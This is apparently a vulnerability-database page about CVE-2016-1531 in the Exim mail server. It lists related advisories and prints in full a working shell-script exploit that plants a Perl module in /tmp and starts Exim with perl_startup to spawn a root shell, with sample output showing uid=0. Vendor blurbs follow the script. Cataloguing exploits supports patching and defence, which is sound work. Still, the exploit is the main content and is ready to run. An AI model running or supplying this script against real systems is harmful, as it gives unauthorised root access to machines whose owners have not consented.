| Reporter | Title | Published | Views | Family All 56 |
|---|---|---|---|---|
| Exim 4.84-3 - Privilege Escalation | 9 Mar 201600:00 | – | zdt | |
| Exim < 4.86.2 - Privilege Escalation | 10 Mar 201600:00 | – | zdt | |
| Exim - 'perl_startup' Privilege Escalation (Metasploit) | 15 Apr 201600:00 | – | zdt | |
| exim -- local privillege escalation | 26 Feb 201600:00 | – | freebsd | |
| exim: privilege escalation | 10 Mar 201600:00 | – | archlinux | |
| CVE-2016-1531 | 9 Mar 201600:00 | – | circl | |
| Exim Configuration File Path Elevation of Privilege Vulnerability | 7 Mar 201600:00 | – | cnvd | |
| CVE-2016-1531 | 7 Apr 201623:00 | – | cve | |
| CVE-2016-1531 | 7 Apr 201623:00 | – | cvelist | |
| [SECURITY] [DSA 3517-1] exim4 security update | 14 Mar 201605:48 | – | debian |
`#!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" arguement -ps.
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
#
# -- Hacker Fantastic
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;
system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation